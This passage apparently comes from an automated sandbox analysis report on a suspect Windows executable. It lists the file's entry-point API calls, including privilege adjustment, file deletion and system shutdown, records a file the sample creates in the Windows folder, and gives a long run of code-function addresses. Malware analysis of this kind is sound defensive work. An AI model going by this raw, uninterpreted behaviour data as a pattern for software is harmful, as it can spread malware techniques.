            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_00403348
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile created: C:\Windows\BehovsundersgelsesJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_738F1A980_2_738F1A98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0040694512_2_00406945
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0040711C12_2_0040711C
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458C47212_2_0458C472
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458D54812_2_0458D548
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458C73812_2_0458C738
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458C14612_2_0458C146
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458D27812_2_0458D278
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458537012_2_04585370
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458CCD812_2_0458CCD8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04589DE012_2_04589DE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04583E0912_2_04583E09
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04586FC812_2_04586FC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458CFAA12_2_0458CFAA
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458E98812_2_0458E988
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_045869A012_2_045869A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458CA0812_2_0458CA08
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458E97A12_2_0458E97A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458F96112_2_0458F961
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_045829EC12_2_045829EC
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04583AA112_2_04583AA1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04583B9512_2_04583B95
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0462E7E012_2_0462E7E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0462A6FC12_2_0462A6FC
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0462D55812_2_0462D558
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04683D7012_2_04683D70
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E91FA812_2_37E91FA8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E92A9012_2_37E92A90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9966812_2_37E99668
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9514812_2_37E95148
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9F4D812_2_37E9F4D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9185012_2_37E91850
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9E7CF12_2_37E9E7CF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9E7D012_2_37E9E7D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E91FA112_2_37E91FA1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9E36912_2_37E9E369
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9E37812_2_37E9E378
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9DF2012_2_37E9DF20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E90B2012_2_37E90B20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E90B3012_2_37E90B30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9DF1F12_2_37E9DF1F
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9DAC812_2_37E9DAC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9DAB912_2_37E9DAB9
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9D66012_2_37E9D660
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9D67012_2_37E9D670
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9D21812_2_37E9D218
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9CDC012_2_37E9CDC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9CDAF12_2_37E9CDAF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9514212_2_37E95142
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9F92112_2_37E9F921
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E99D3812_2_37E99D38
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9F93012_2_37E9F930
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E98CC012_2_37E98CC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9F08012_2_37E9F080
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9F07112_2_37E9F071
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9184112_2_37E91841
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9004012_2_37E90040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9EC2812_2_37E9EC28
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9002712_2_37E90027
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_37E9EC1812_2_37E9EC18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38087B7812_2_38087B78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808BDA012_2_3808BDA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38088FB012_2_38088FB0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380881D012_2_380881D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808300812_2_38083008
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808D00012_2_3808D000
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808A20212_2_3808A202
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808300712_2_38083007
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38086A1812_2_38086A18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F01912_2_3808F019
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808461012_2_38084610
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808A21012_2_3808A210
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808001112_2_38080011
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F02812_2_3808F028
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808C22A12_2_3808C22A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808462012_2_38084620
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808602112_2_38086021
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808C23812_2_3808C238
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808943A12_2_3808943A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808603012_2_38086030
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808944812_2_38089448
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808004012_2_38080040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38081A4112_2_38081A41
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38081A5012_2_38081A50
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808345012_2_38083450
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808E25112_2_3808E251
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38084A6812_2_38084A68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808346012_2_38083460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808E26012_2_3808E260
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808B46012_2_3808B460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38084A7812_2_38084A78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808647812_2_38086478
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808B47012_2_3808B470
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38086E7012_2_38086E70
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38086E7212_2_38086E72
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808648812_2_38086488
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808D48812_2_3808D488
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808048912_2_38080489
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808049812_2_38080498
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808D49812_2_3808D498
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38081E9812_2_38081E98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808A69912_2_3808A699
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38081EA812_2_38081EA8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808A6A812_2_3808A6A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380838B812_2_380838B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380872B812_2_380872B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F4B012_2_3808F4B0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380872C812_2_380872C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38084EC012_2_38084EC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F4C012_2_3808F4C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808C6C112_2_3808C6C1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38084ED012_2_38084ED0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808C6D012_2_3808C6D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380898D012_2_380898D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808E6E912_2_3808E6E9
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380898E012_2_380898E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380808E012_2_380808E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808E6F812_2_3808E6F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808B8F812_2_3808B8F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380808F012_2_380808F0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380822F012_2_380822F0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808B90812_2_3808B908
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808230012_2_38082300
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808531A12_2_3808531A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808771012_2_38087710
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808532812_2_38085328
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808772012_2_38087720
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808D92012_2_3808D920
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38080D3912_2_38080D39
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808D93012_2_3808D930
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808AB3012_2_3808AB30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38080D4812_2_38080D48
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808274912_2_38082749
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F94912_2_3808F949
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808AB4012_2_3808AB40
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808275812_2_38082758
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808F95812_2_3808F958
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808CB5912_2_3808CB59
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808CB6812_2_3808CB68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38089D6812_2_38089D68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38087B6912_2_38087B69
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38089D7812_2_38089D78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808577012_2_38085770
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808578012_2_38085780
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808EB8012_2_3808EB80
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808EB9012_2_3808EB90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808BD9012_2_3808BD90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380811A012_2_380811A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38082BA012_2_38082BA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38088FA112_2_38088FA1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808DDB912_2_3808DDB9
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38082BB012_2_38082BB0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808DDC812_2_3808DDC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808AFC912_2_3808AFC9
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380881C012_2_380881C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808AFD812_2_3808AFD8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38085BD812_2_38085BD8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380815E812_2_380815E8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380815F812_2_380815F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3808CFF112_2_3808CFF1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FAC4812_2_380FAC48
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F409012_2_380F4090
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F77B012_2_380F77B0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F47E012_2_380F47E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F6E0F12_2_380F6E0F
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FDC0A12_2_380FDC0A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F0E0812_2_380F0E08
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F860812_2_380F8608
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FF40012_2_380FF400
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F5B0012_2_380F5B00
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F250012_2_380F2500
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FDC1812_2_380FDC18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F991812_2_380F9918
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FB11012_2_380FB110
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F992812_2_380F9928
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F172812_2_380F1728
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F562712_2_380F5627
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FEF2712_2_380FEF27
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F002312_2_380F0023
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F6E2012_2_380F6E20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F2E2012_2_380F2E20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FC42012_2_380FC420
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F173812_2_380F1738
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F563812_2_380F5638
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FEF3812_2_380FEF38
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FAC3712_2_380FAC37
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F2E3012_2_380F2E30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FC43012_2_380FC430
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F813012_2_380F8130
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F694712_2_380F6947
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F004012_2_380F0040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F814012_2_380F8140
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FD74012_2_380FD740
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F945A12_2_380F945A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F695812_2_380F6958
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F205812_2_380F2058
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FBF5812_2_380FBF58
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FD75012_2_380FD750
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F375012_2_380F3750
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F206812_2_380F2068
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FBF6812_2_380FBF68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F7C6812_2_380F7C68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FEA6112_2_380FEA61
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F376012_2_380F3760
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F946012_2_380F9460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F096012_2_380F0960
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F516012_2_380F5160
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F7C7812_2_380F7C78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FD27712_2_380FD277
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FEA7012_2_380FEA70
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F517012_2_380F5170
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F097012_2_380F0970
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FA77012_2_380FA770
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FD28812_2_380FD288
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F298812_2_380F2988
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F8F8712_2_380F8F87
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F648212_2_380F6482
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FA78012_2_380FA780
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F408012_2_380F4080
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F779F12_2_380F779F
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FE59A12_2_380FE59A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F299812_2_380F2998
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F8F9812_2_380F8F98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F4C9712_2_380F4C97
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F649012_2_380F6490
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F129012_2_380F1290
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FBA9012_2_380FBA90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FE5A812_2_380FE5A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F4CA812_2_380F4CA8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FA2A812_2_380FA2A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F12A012_2_380F12A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FBAA012_2_380FBAA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FCDBC12_2_380FCDBC
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F32BA12_2_380F32BA
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FA2B812_2_380FA2B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F5FB812_2_380F5FB8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FCDB712_2_380FCDB7
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FF8B712_2_380FF8B7
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FCDB012_2_380FCDB0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F5FC812_2_380F5FC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F32C812_2_380F32C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FF8C812_2_380FF8C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F04C812_2_380F04C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FB5C712_2_380FB5C7
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F1BC112_2_380F1BC1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F8AC112_2_380F8AC1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FCDC012_2_380FCDC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F04D812_2_380F04D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FB5D812_2_380FB5D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F72D712_2_380F72D7
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F47D112_2_380F47D1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F1BD012_2_380F1BD0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F8AD012_2_380F8AD0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FE0D012_2_380FE0D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FC8EE12_2_380FC8EE
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F3BEA12_2_380F3BEA
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F72E812_2_380F72E8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FE0E012_2_380FE0E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F9DE012_2_380F9DE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FB0FF12_2_380FB0FF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F3BF812_2_380F3BF8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FC8F812_2_380FC8F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F0DF812_2_380F0DF8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F85F812_2_380F85F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F9DF012_2_380F9DF0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F24F012_2_380F24F0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380F5AF012_2_380F5AF0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380FF3F012_2_380FF3F0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C69812_2_3811C698
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C0B812_2_3811C0B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38115AE012_2_38115AE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C3A012_2_3811C3A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811001512_2_38110015
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811F01E12_2_3811F01E
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38112C0012_2_38112C00
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811482012_2_38114820
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811162012_2_38111620
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811982912_2_38119829
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811F02812_2_3811F028
